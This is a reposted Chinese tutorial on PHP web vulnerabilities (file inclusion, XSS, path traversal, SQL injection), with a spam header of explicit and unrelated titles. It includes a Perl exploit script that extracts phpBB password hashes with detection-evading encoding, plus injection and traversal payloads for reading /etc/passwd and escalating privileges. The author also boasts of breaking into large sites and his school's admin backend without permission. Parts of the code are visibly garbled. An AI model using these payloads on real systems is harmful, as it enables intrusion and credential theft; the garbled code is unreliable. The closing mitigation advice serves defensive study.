国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發 > PHP > 正文

PHP網站漏洞的相關總結

2024-05-04 23:05:04
字體:
來源:轉載
供稿:網友

最大的網站源碼資源下載站,

  從現在的網絡安全來看,大家最關注和接觸最多的web頁面漏洞應該是asp了,在這方面,小竹是專家,我沒發言權.然而在php方面來看,也同樣存在很嚴重的安全問題,但是這方面的文章卻不多.在這里,就跟大家來稍微的討論一下php頁面的相關漏洞吧.


  我對目前常見的php漏洞做了一下總結,大致分為以下幾種:包含文件漏洞,腳本命令執行漏洞,文件泄露漏洞,sql注入漏洞等幾種.當然,至于cookie欺騙等一部分通用的技術就不在這里討論了,這些資料網上也很多.那么,我們就一個一個來分析一下怎樣利用這些漏洞吧!


  首先,我們來討論包含文件漏洞.這個漏洞應該說是php獨有的吧.這是由于不充分處理外部提供的惡意數據,從而導致遠程攻擊者可以利用這些漏洞以web進程權限在系統上執行任意命令.我們來看一個例子:假設在a.php中有這樣一句代碼:
  <?php
  include($include."/xxx.php");
  ?>
  在這段代碼中,$include一般是一個已經設置好的路徑,但是我們可以通過自己構造一個路徑來達到攻擊的目的.比方說我們提交:a.php?include=http://web/b.php,這個web是我們用做攻擊的空間,當然,b.php也就是我們用來攻擊的代碼了.我們可以在b.php中寫入類似于:passthru("/bin/ls /etc");的代碼.這樣,就可以執行一些有目的的攻擊了.(注:web服務器應該不能執行php代碼,不然就出問題了.相關詳情可以去看<<如何對php程序中的常見漏洞進行攻擊>>).在這個漏洞方面,出狀況的很多,比方說:paypal store front,
hotnews,mambo open source,phpdig,yabb se,phpbb,invisionboard,solmetra spaw editor,les visiteurs,phpgedview,x-cart等等一些.


  接著,我們再來看一下腳本命令執行漏洞.這是由于對用戶提交的uri參數缺少充分過濾,提交包含惡意html代碼的數據,可導致觸發跨站腳本攻擊,可能獲得目標用戶的敏感信息。我們也舉個例子:在php transparent的php php 4.3.1以下版本中的index.php頁面對phpsessid缺少充分的過濾,我們可以通過這樣的代碼來達到攻擊的目的:
  http://web/index.php?phpsessid="><script>...</script>在script里面我們可以構造函數來獲得用戶的一些敏感信息.在這個漏洞方面相對要少一點,除了php transparent之外還有:php-nuke,phpbb,php classifieds,phpix,ultimate php board等等.


  再然后,我們就來看看文件泄露漏洞了.這種漏洞是由于對用戶提交參數缺少充分過濾,遠程攻擊者可以利用它進行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發現的phpmyadmin來做例子.在phpmyadmin中,export.php頁面沒有對用戶提交的'what'參數進行充分過濾,遠程攻擊者提交包含多個'../'字符的數據,便可繞過web root限制,以web權限查看系統上的任意文件信息。比方說打入這樣一個地址:export.php?what=../../../../../../etc/passwd%00 就可以達到文件泄露的目的了.在這方面相對多一點,有:myphpnuke,mcnews等等.


  最后,我們又要回到最興奮的地方了.想想我們平時在asp頁面中用sql注入有多么爽,以前還要手動注入,一直到小竹悟出"sql注入密笈"(嘿嘿),然后再開做出nbsi以后,我們nb聯盟真是拉出一片天空.曾先后幫csdn,大富翁論壇,中國頻道等大型網站找出漏洞.(這些廢話不多說了,有點跑題了...).還是言規正傳,其實在asp中sql的注入和php中的sql注入大致相同,只不過稍微注意一下用的幾個函數就好了.將asc改成ascii,len改成length,其他函數基本不變了.其實大家看到php的sql注入,是不是都會想到php-nuke和phpbb呢?不錯,俗話說樹大招分,像動網這樣的論壇在asp界就該是漏洞這王了,這并不是說它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發現的安全漏洞也就越多了.phpbb也是一樣的,現在很大一部分人用php做論壇的話,一般都是選擇了phpbb.它的漏洞也是一直在出,從最早phpbb.com phpbb 1.4.0版本被人發現漏洞,到現在最近的phpbb 2.0.6版本的groupcp.php,以及之前發現的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個樣子吧.這也一直導致,一部分人在研究php漏洞的時候都會拿它做實驗品,所謂百練成精嘛,相信以后的phpbb會越來越好.


  好了,我們還是來分析一下漏洞產生的原因吧.拿viewtopic.php頁面來說,由于在調用viewtopic.php時,直接從get請求中獲得"topic_id"并傳遞給sql查詢命令,而并沒有進行一些過濾的處理,攻擊者可以提交特殊的sql字符串用于獲得md5密碼,獲得此密碼信息可以用于自動登錄或者進行暴力破解。(我想應該不會有人想去暴力破解吧,除非有特別重要的原因).先看一下相關源代碼:
#   if ( isset($http_get_vars[post_topic_url]) )
#   {
#      $topic_id = intval($http_get_vars[post_topic_url]);
#   }
#   else if ( isset($http_get_vars['topic']) )
#   {
#      $topic_id = intval($http_get_vars['topic']);
#   }
從上面我們可以看出,如果提交的view=newest并且sid設置了值的話,執行的查詢代碼像下面的這個樣子(如果你還沒看過phpbb源代碼的話,建議你看了再對著這里來看,受影響系統為:phpbb 2.0.5和phpbb 2.0.4).
#       $sql = "select p.post_id
#       from " . posts_table . " p, " . sessions_table . " s, " . users_table . " u
#       where s.session_id = '$session_id'
#         and u.user_id = s.session_user_id
#         and p.topic_id = $topic_id
#         and p.post_time >= u.user_lastvisit
#       order by p.post_time asc
#       limit 1";
rick提供了下面的這斷測試代碼:
use io::socket;
$remote = shift || 'localhost';
$view_topic = shift || '/phpbb2/viewtopic.php';
$uid = shift || 2;
$port = 80;
$dbtype = 'mysql4';  # mysql4 or pgsql
print "trying to get password hash for uid $uid server $remote dbtype: $dbtype/n";
$p = "";
for($index=1; $index<=32; $index++)
{
   $socket = io::socket::inet->new(peeraddr => $remote,
               peerport => $port,
               proto => "tcp",
               type => sock_stream)
   or die "couldnt connect to $remote:$port : $@/n";
   $str = "get $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " http/1.0/n/n";
   print $socket $str;
   print $socket "cookie: phpbb2mysql_sid=1/n";  # replace this for pgsql or remove it
   print $socket "host: $remote/n/n";
   while ($answer = <$socket>)
   {
        if ($answer =~ /location:.*/x23(/d+)/) # matches the location: viewtopic.php?p=<num>#<num>
        {
            $p .= chr ();
        }
   }
   close($socket);
}
print "/nmd5 hash for uid $uid is $p/n";
# random encode str. helps avoid detection
sub random_encode
{
   $str = shift;
   $ret = "";
   for($i=0; $i<length($str); $i++)
   {
        $c = substr($str,$i,1);
        $j = rand length($str) * 1000;


        if (int($j) % 2 || $c eq ' ')
        {
            $ret .= "%" . sprintf("%x",ord($c));
        }
        else
        {
            $ret .= $c;
        }
   }
   return $ret;
}
sub make_dbsql
{
   if ($dbtype eq 'mysql4')
   {
        return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
   } elsif ($dbtype eq 'pgsql')
   {
        return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
   }
   else
   {
        return "";
   }
}
這斷代碼,我就不多做解釋了.作用是獲得hash值.


  看到這里,大家可能有點疑問,為什么我前面講的那些改的函數怎么沒有用到,我講出來不怕大家笑話:其實網上很多站點有些頁面的查詢語句看起來會是這樣:
display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc
不要笑,這是真的,我還靠這個進過幾個大型網站.至于哪一些,不好講出來,不過我們學校的網站,我就是靠這個進后臺的(希望學校網絡中心的看不到這篇文章,^_^).把前面那函數用上吧.不然你只有改人家的密碼了哦!!!


  差點忘了一點,在sql注入的時候,php與asp有所不同,mysql對sql語句的運用沒有mssql靈活,因此,很多在mssql上可以用的查詢語句在mysql數據庫中都不能奏效了. 一般我們常見的注入語句像這樣:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再進一步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt
這樣可以將數據庫數據導出為文件,然后可以查看.
  或是這樣:mode=',user_level='4
這個語句一般用在修改資料時,假設頁面存在漏洞的話,就可以達到提升權限的做用.
其它的如' or 1=1 -- 或者:1' or 1='1則跟asp差不多.這里不多講了.在php里面,sql注入看來還是漏洞之首啊,有太多的頁面存在這個問題了.


  其實大家可以看出來,上面那些分類歸根結底只有一個原因:提交參數沒過濾或是過濾不夠嚴謹.黑客防線向來有攻有守.這里,就大致講一下防范的方法吧.
  
  首先,我個人認為最重要的一點是將magic_quotes_gpc高為on,它的作用是將單引號,雙引號,反斜線,和空字符轉換為含有反斜線的字符,如select * from admin where username='$username' and password='$password'語句,攻擊者想用1' or 1='1跳過驗證,但是,那些字符串將被轉換成這樣:select * from admin where username='a' and password='1/' or 1=/'1'從而達到阻止注入的目的,事實也就是自動進行了addslashes()操作.再不行的話,自己定義函數處理吧.現在看來,那些搞php注入的人也比較郁悶,因為myslq4以下版本不支持子語句,而新版本的mysql又會將magic_quotes_gpc選項默認為開.


  解決包含文件漏洞用的方法就是:要求程序員包含文件里的參數盡量不要使用變量,如果使用變量,就一定要嚴格檢查要包含的文件名,絕對不能由用戶任意指定,建議設global_variables為off。如前面文件打開中限制php操作路徑是一個必要的選項。另外,如非特殊需要,一定要關閉php的遠程文件打開功能。修改php.ini文件:allow_url_fopen = off(注:參見<<php安全問題:遠程溢出、dos、safe_mode繞過漏洞>>).


  還有一點我覺得很多網站都會有這個問題,就是沒有關錯誤顯示.輕一看可能沒什么,但是一些盯了很久(用詞有點不對哦)的人就可以通過錯誤提示來獲得如數據庫信息,網頁文件物理路徑等等。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 太和县| 扬州市| 兴安县| 南宁市| 鲁甸县| 阿鲁科尔沁旗| 瓦房店市| 镇雄县| 建德市| 于都县| 伊宁市| 从江县| 博爱县| 重庆市| 正宁县| 宝清县| 开鲁县| 昂仁县| 六安市| 思南县| 呼和浩特市| 葵青区| 辽源市| 建宁县| 项城市| 梧州市| 高青县| 武义县| 伊川县| 津市市| 广饶县| 汉沽区| 正宁县| 霍山县| 眉山市| 泊头市| 安吉县| 绥芬河市| 宁远县| 漳平市| 卫辉市|